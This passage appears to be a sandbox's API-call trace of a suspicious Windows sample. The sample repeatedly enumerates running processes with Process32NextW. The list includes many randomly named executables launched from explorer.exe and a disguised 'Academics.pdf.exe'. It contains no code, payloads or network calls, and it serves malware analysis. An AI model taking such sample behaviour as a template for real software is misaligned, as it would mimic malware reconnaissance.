out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.603] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.605] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.606] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.609] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.610] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0301.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0301.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0301.614] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0301.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0301.616] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0301.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0301.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0301.618] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0301.619] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0301.620] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0301.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0301.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0301.622] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0301.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0301.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0301.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0301.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0301.627] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0301.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0301.629] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.629] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.630] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.632] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0301.633] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.634] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0301.634] CloseHandle (hObject=0x294) returned 1 [0301.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0301.635] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0301.635] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.637] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.638] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.639] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.641] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.642] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.643] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.647] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.650] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.651] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.653] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0301.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0301.657] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0301.658] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0301.659] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0301.660] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0301.661] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0301.662] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0301.663] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0301.664] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0301.664] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0301.665] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0301.666] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0301.667] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0301.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0301.669] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0301.670] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 